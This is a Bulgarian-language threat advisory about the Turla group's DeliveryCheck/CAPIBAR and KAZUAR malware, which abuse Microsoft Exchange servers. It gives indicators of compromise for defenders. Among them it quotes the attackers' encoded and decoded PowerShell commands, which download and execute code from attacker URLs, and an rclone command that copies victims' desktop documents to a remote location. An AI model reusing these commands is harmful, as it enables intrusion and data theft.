Oт Microsoft и CERT-UA предупреждават за нов вид атаки насочени към защитните механизми на Microsoft Exchange сървърите с нов зловреден код DeliveryCheck.
Зад атаката стои хакерската група Turla, спонсорирана от Руската Федерация. Първата фаза на атаката включва изпращане на phishing email с прикачен Excel XLSM файл, който съдържа зловреден macros скрипт. При активиране на този скрипт се стартира PowerShell команда, която създава scheduled task (планирана задача), представящ се за актуализация на Firefox браузър. Този task изтегля DeliveryCheck backdoor, стартира се в оперативната памет, осъществява връзка с Command & Control сървър на Turla, от където получава отдалечено команди за изпълняване и инсталиране на други зловредни кодове.
След заразяване на устройствата с backdoor-а се използва за извличане на данни от компрометираните устройства чрез използване на Rclone (безплатен инструмент за синхронизиране на файлове към и от различни Cloud доставчици)
Друго характерно за DeliveryCheck е, че превръща Microsoft Exchange пощенски сървър в отдалечен Command & Control сървър, който от своя страна става част от схемата на разпространение. Инсталира се чрез Desired State Configuration (DSC), което е PowerShell функционалност, позволяваща на администраторите да създават стандартизирана сървърни конфигурации, и да я прилагат автоматично на множество клиентски устройства. Създава се конфигурация, която заражда base64 стринг, който представлява изпълним зловреден файл. Така Microsoft Exchange сървърите се превръщат в сървъри за разпространение на зловредения код.
В наблюдаваните атаки Turla инсталират KAZUAR backdoor с цел извличане на данни. Той позволява пълен кибершпионаж, влючително изпълнение на javascript на устройствата, кражба на данни от event logs, кражба на authentication tokens, кражба на бисквитки, акаунти от софтуер, включително от браузъри, FTP клиенти, VPN клиенти, KeePass, Azure, AWS, и Outlook акаунти. Освен това позволява ексфилтриране на съобщения на Signal Desktop клиент, включително и изпратени или получени файлове.
IoC:
cdf7fa901701ea1ef642aeb271c70361 1c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc localhost.mof (CAPIBAR server (MOF))
153b713b3c6e642f39993d65ab33c5f0 5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e Pending.mof (CAPIBAR server (MOF))
9ececb4acbf692c2a8ea411f2e7dd006 07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57 Server.dll (CAPIBAR server)
5c7466a177fcaad2ebab131a54c28fab bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76 Control.dll (CAPIBAR)
b63c2ec9a631e0217d39c4a43527a0ce 1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3 logon.aspx
420b7dc391f2cb0a9a684c1c48c334e2 01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7 logon[1].aspx
491e462bf1213fede82925dea5df8fff ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39 logon[1].aspx
9dd2bea4f2df8d3ef51dc10c6db2e07a aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe SYNC[1]
8c56c22343853d3797037bdac2cec6c7 d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f wp-file-script.js
17402fc21c7bafae2c1a149035cd0835 19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452 Control.dll (CAPIBAR)
d3065b4b1e8f6ecb63685219113ff0b8 4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947 Control.dll (CAPIBAR)
5210b3d85fd0026205baee2c77ac0acd 64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a two.exe (CAPIBAR)
4065e647380358d22926c24a63c26ac4 5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd Config.dat
11a289347b95aab157aa0efe4a59bf24 91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233 Senatorial.exe (KAZUAR)
cba1f4c861240223332922d2913d18e5 b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8 1.ps1
65102299bf8d7f0129ebbcb08a9c2d98 8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8 message (Steel Signal’s „config.json“, „db.sqlite“)
C:\Windows\System32\config\systemprofile\AppData\Roaming\ASKOD\localhost.mof
C:\Windows\System32\config\systemprofile\AppData\Roaming\ZOV\localhost.mof
C:\Windows\System32\Configuration\Pending.mof
C:\ProgramData\ASUS\ASUS System Control Interface\AsusSoftwareManager\Config.dat
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\8HIA0N4E\logon[1].aspx
%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\__AssemblyInfo__.ini
%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\logon.aspx
%LOCALAPPDATA%\Microsoft\OneDrive\Update\UpdateService.exe
%LOCALAPPDATA%\Microsoft\OneDrive\Update\rclone.conf
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\UOIQCADZ\SYNC[1]
powershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQAZgBpAGwAZQA9ACQAdwAuAEQAbwB3AG4ATABvAGEAZABTAHQAUgBpAE4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBkAGUAbABhAGkAZABhAC4AdQBhAC8AcABsAHUAZwBpAG4AcwAvAHYAbQBzAGUAYQByAGMAaAAvAHcAcAAtAGMAbwBuAGYAaQBnAC0AdABoAGUAbQBlAHMALgBwAGgAcAAnACkAOwBpAEUAeAAgACQAZgBpAGwAZQA=
powershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFcAZQBiAEMATABpAGUATgB0ADsAJABpAHUAYQBXAD0AJABHAHIAcQBkAHEAdwBkAGUALgBEAE8AdwBOAEwATwBhAEQAUwB0AFIAaQBOAGcAKAAnAGgAVAB0AFAAcwA6AC8ALwBhAGwAZQBpAG0AcABvAHIAdABhAGQAbwByAGEALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AcwBsAGkAZABlAHMAXwBsAG8AZwBvAC8AJwApADsAYABpAG4AdgBPAGAASwBlAGAALQBgAEUAeABgAFAAcgBlAHMAcwBgAEkAbwBgAE4AIAAkAGkAdQBhAFcA
$w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg(‘hxxps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php’);iEx $file
$Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=$Grqdqwde.DOwNLOaDStRiNg(‘hxxPs://aleimportadora[.]net/images/slides_logo/’);invOKe-ExPressIoN $iuaW
„C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\UpdateService.exe“ „copy“ „C:\Users\%USERNAME%\Desktop“ „remote:%COMPUTERNAME%\Desktop“ „–include“ „*.{{jpe?g|txt|docx?|rtf|pdf|xlsx?|xlsm|pptx?|zip|rar|7z}}“ „-M“ „–max-size“ „50M“ „–max-age“ „200d“ „–bwlimit“ „1M:1M“ „–order-by“ „modtime,desc“ „–log-file=C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\log_1.dat“ „-vv“
\Mozilla\Updates Firefox Browser (Scheduled Task)
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBarApi\GameBarId
HKEY_CURRENT_USER\Software\Classes\CLSID\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\InprocServer32\1.0.0.0\CodeBase
HKEY_CURRENT_USER\Software\Classes\CLSID\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\ScriptletURL
HKEY_CURRENT_USER\Software\Classes\CLSID\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\ScriptletURL
Мрежови IoC:
hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-plugins.php
hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php
hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-file-script.js
hXXps://atomydoc[.]kg/src/open_center/
hXXps://atomydoc[.]kg/src/open_center/?page=ccl
hXXps://atomydoc[.]kg/src/open_center/?page=fst
hXXps://atomydoc[.]kg/src/open_center/?page=snd
hXXps://atomydoc[.]kg/src/open_center/?page=trd
hXXps://aleimportadora[.]net/images/slides_logo/
hXXps://aleimportadora[.]net/images/slides_logo/?page=
hXXps://aleimportadora[.]net/images/slides_logo/fg/message
hXXps://aleimportadora[.]net/images/slides_logo/fg/music
hXXps://aleimportadora[.]net/images/slides_logo/fg/video
hXXps://aleimportadora[.]net/images/slides_logo/index.php
hXXps://octoberoctopus.co[.]za/wp-includes/sitemaps/web/
hXXps://sansaispa[.]com/wp-includes/images/gallery/
hXXps://www.pierreagencement[.]fr/wp-content/languages/index.php
hXXps://mail.aet.in[.]ua/outlook/api/logon.aspx
hXXps://mail.kzp[.]bg/outlook/api/logon.aspx
hXXps://mail.numina[.]md/owa/scripts/logon.aspx (CAPIBAR C2URL)
hXXps://mail.aet.in[.]ua/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.arlingtonhousing[.]us/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.kzp[.]bg/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.lechateaudelatour[.]fr/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)
hXXps://mail.lebsack[.]de/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)
Източниик на информация: